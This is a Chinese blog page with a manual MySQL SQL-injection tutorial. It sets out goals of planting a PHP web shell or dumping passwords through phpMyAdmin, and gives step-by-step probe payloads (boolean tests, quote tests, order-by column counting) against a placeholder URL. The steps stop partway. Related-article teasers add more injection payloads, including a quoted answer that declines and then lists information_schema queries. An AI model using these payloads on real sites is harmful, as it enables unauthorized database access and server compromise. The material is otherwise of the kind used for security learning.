mysql 手工注入 字符类型

最新推荐文章于 2025-11-22 16:29:11 发布
原创 最新推荐文章于 2025-11-22 16:29:11 发布 · 1.8k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #手注

本文介绍了一种常见的Web安全漏洞——SQL注入,并详细解释了如何利用该漏洞进行攻击。包括判断SQL注入点、确定数据库版本、获取数据库信息及利用技巧。
我的基本思路:
1、目标站点环境为:Windows+Apache+Mysql+PHP
2、存在SQL注入,能否直接写一句话木马
3、存在SQL注入,获取数据库中用户口令,登录应用系统后上传webshell

4、获取数据库口令登录phpMyAdimin,用phpMyAdmin写入一句话木马

当拿到一个MySQL的注入点的时候,我们需要判断MySQL的版本。因为当MySQL的版本小于4.0时,是不支持union select联合查询的;当MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。现在一般情况下,MySQL都是4.0以上的,所以我们就放心的用联合查询吧。

判断版本:and ord(mid(version(),1,1))>51

具体来说明下:
1、尝试1=1的情况,正确

  1. http://xxx/xxx.php?id=2900 and 1=1


2、尝试1=2的情况,错误,说明这是个整型的注入点
  1. http://xxx/xxx.php?id=2900 and 1=2



3、尝试'1'='1'的情况,错误,说明PHP开启了magic_quotes_gpc=on,不能直接利用注入语句写webshell了。还好这里是整型的注入点,如果是字符型的注入点那就没办法了。
  1. http://xxx/xxx.php?id=2900 and '1'='1'
4.如果第2步正确,使用字符类型 手工注入
尝试1=2'的情况,错误,说明这是个字符型的注入点
  1. http://xxx/xxx.php?id=2900 and 1=2'   或者  http://xxx/xxx.php?id=2900 '

5.order by 24,尝试当前注入语句的表中字段个数为24,错误,说明字段数小于24

  http://xxx/xxx.php?id=2900 order by 24

6.order by 23,尝试当前注入语句的表中字段个数为23,正确,说明字段数等于23

  http://xxx/xxx.php?id=2900 order by 23

   注:采用二分法策略可以提高效率

7.

【漏洞挖掘】——17、SSI漏洞介绍于挖掘(上)
Fly_鹏程万里
03-01 1232
(1)找注入点http://xx.xx.xx.xx:xxxx/?id=1 #显示内容 http://xx.xx.xx.xx:xxxx/?id=1 ' #无任何显示 (2)字段个数为3:http://xx.xx.xx.xx:xxxx/?id=1 ' order by 3 -- xx #显示正常 http://xx.xx.xx.xx:xxxx/?id=1 ' order by ...
Sql注入实验(一)——字符型注入(GET)
DaydreamF的博客
04-13 1706
Sqli-libs Less1——字符型注入 URL:http://192.168.224.128/sqli/Less-1/ 一、手工注入 1…打开页面,如下所示: 2.根据提示,在url后输入参数id的值,页面显示: 说明,根据传入id参数值的不同,后台服务器查询的数据不同,展示在了前端界面。(参数可控) 3.尝试在参数值的后面输入特殊字符,看页面是否报出数据库语法错误: 报错语句: You have an error in your SQL syntax; check the manual t
SQL注入—字符型注入(GET)
Ethan024的博客
03-22 680
SQL注入—数值型注入(GET)(本文仅供学习或参考) 实验准备: 皮卡丘靶场—SQL Injection—数值型注入(GET) 实验步骤: 当输入一个数据库里存在的用户名时候,会出现相关邮箱和id: 当输入一个不存在的字符串时,没有任何信息: 查看其URL,发现请求实在URL中提交的,是一个GET请求: http://localhost/pikaqiu.cn/vul/sqli/sqli_str.php?name=1111&submit=%E6%9F%A5%E8%AF%A2
你的网站真的安全吗?——详解SQL字符型注入
最新发布
haishiqiguai的博客,欢迎你的到来,希望你能在此找到汝心中所求
11-22 1139
本篇文章详细解释了SQL字符型注入的原理、危害、实战演示及防御方法,核心思想是:SQL字符型注入是通过构造恶意字符串干扰SQL查询的攻击方式,根本原因在于程序未对用户输入做严格过滤,防御关键在于使用参数化查询和输入验证
SQL注入之PHP-MySQL实现手工注入-字符型
weixin_30700977的博客
10-23 273
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递...
mysql字符型注入
fdhdgsdfdsa的博客
03-09 436
字符型会把1等等数字当成字符,此时数字型注入会不起作用,之后需要使用英文状态下单引号闭合前面字符,后面需要释避免报错 判断是否存在漏洞 当输入1’时报错,当输入1"时正常显示 ,可以判断问题参数为id,漏洞类型为字符型 验证判断 先用单引号闭合,语法后方在释避免报错,之后用and 1=1和and 1=2来验证判断,如: http://www.xxx.com/sqli/01.php?id=1' and 1=1 -- a 命令中a可随意填写,只是释需要空格,防止浏览器过滤 返回数据,说明执行
精选资源
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞...MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入(时间注入)等...
PHP、mysql手工注入
10-12
【PHP与MySQL手工注入详解】 在互联网开发中,PHP与MySQL是常见的服务器端脚本语言和数据库管理系统,广泛应用于网站的构建。然而,随着技术的发展,网络安全问题也日益凸显,其中“手工注入”就是一种针对PHP与...
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型)
2303_81096390的博客
08-02 709
进入靶场环境,点击登录框下面的那一串流动的字符进入具体的注入点页面查看url,发现有可变的参数?id=,此处为字符型注入sql注入分为字符型注入和数字型注入,两者有什么区别呢,简单来说就是字符型注入需要闭合,而数字型注入不需要闭合具体解释:为什么字符型需要闭合,数字型不需要?
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 4175
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 831
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
字符型注入
haodawei123的博客
01-17 1799
字符型注入的特点是网站链接末尾不是id=11这样的,而是字符如 http://www.xycj.gov.cn/cks/kw.asp?action=gh 注入点 字母 http://www.zgcforum.org/forum.asp?title=会议议程 注入点中文 测试代码 : ‘+and+’1’=‘1 返回正常 ‘+and+’1’='2 返回错误 ...
MySQL联合注入之字符型注入
m0_50211409的博客
03-27 1887
关于字符型注入 首先我们都知道,在数据库中字符串都是被单引号与双引号包裹起来的。 我们分析一下字符型注入SQL语句 select*from admin where id='1' 这是字符型注入后的语句 我们在传参的时候 ...
SQL 字符型注入
MZa1213123的博客
03-02 4706
CTFHub SQL 字符型注入 可以看到我们输入的数据会被单引号所括上 尝试正常的 1 and 1=2 发现没有报错 还是有回显 字符型的 1 and 1=2 就相当于只是字符串 并没有发挥其表达式的作用所以这就没有产生错误回显 (不太明白为什么 sql 还是会查询到id = 1 的数据) 这时候我们添加 ' 动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试 整个的 sql 语句大概是 $ sql = "select Data from table_name .
Mysql注入 -- 注入类型
Web安全工具库
05-10 1324
​钱真的很重要,以前总觉得太看重钱的人现实,但没钱,真的寸步难行。。。 ---- 网易云热评 一、整数注入 1、访问http://192.168.139.129/sqli/Less-2/?id=1and 1=1,返回正常 2、访问http://192.168.139.129/sqli/Less-2/?id=2-1,返回正常 3、访问http://192.168.139.129/sqli/Less-2/?id=1and 1=2,返回不正常 说明该注入点是整数注入 二、字符串...
SQL注入】字符型注入
noob_3000的博客
08-07 641
SQL字符型注入
CTFHub | 字符型注入
尼泊罗河伯的博客
10-27 1730
此题目和上一题相似,一个是整数型注入,一个是字符型注入。字符型注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成。
php字符型注入,pikachu-字符型注入(get) #手工注入
weixin_29938009的博客
03-12 325
1.检测注入类型http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2 #不报错http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1'&submit=%E6%9F%A5%E8%AF%A2 ...
Mysql手工注入蓝盾
10-22
蓝盾是腾讯云推出的一款一站式 DevOps 平台,对系统安全性有一定保障机制,进行 MySQL 手工注入蓝盾是违反安全规定和可能触犯法律的行为,这是不被允许的,因此不能为你提供相关注入方法。 网络安全至关重要,在任何情况下,都应该遵守法律法规和道德准则,使用合法、合规的段进行技术探索和实践。如果是为了学习安全测试知识,可以在合法的、经过授权的测试环境中进行,例如搭建本地的测试系统来模拟漏洞场景进行测试。 以下是一些在合法环境中进行 MySQL 注入测试的基本思路(仅用于学习): 1. **发现注入点**:通过对目标应用的输入字段(如搜索框、登录表单等)进行异常输入,观察页面响应的变化,判断是否存在注入漏洞。例如,在输入框中输入单引号 `'` 或其他特殊字符,若页面出现 SQL 错误信息,则可能存在注入点。 2. **判断数据库类型**:可以通过构造特定的 SQL 语句来判断后端使用的是否为 MySQL 数据库。例如,使用 `version()` 函数: ```sql ' OR 1=1 AND (SELECT version()) -- ``` 若页面能够正常显示且返回了 MySQL 的版本信息,则可以确认是 MySQL 数据库。 3. **获取数据库信息**:利用 MySQL 的内置函数,如 `database()` 获取当前数据库名,`user()` 获取当前用户等。示例语句: ```sql ' OR 1=1 AND (SELECT database()) -- ``` 4. **获取表名**:可以通过查询 `information_schema.tables` 表来获取数据库中的表名。示例语句: ```sql ' OR 1=1 AND (SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,1) -- ``` 5. **获取列名**:查询 `information_schema.columns` 表获取指定表的列名。示例语句: ```sql ' OR 1=1 AND (SELECT column_name FROM information_schema.columns WHERE table_name='your_table_name' LIMIT 0,1) -- ``` 6. **获取数据**:根据获取的表名和列名,构造 SQL 语句获取具体的数据。示例语句: ```sql ' OR 1=1 AND (SELECT column_name FROM your_table_name LIMIT 0,1) -- ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值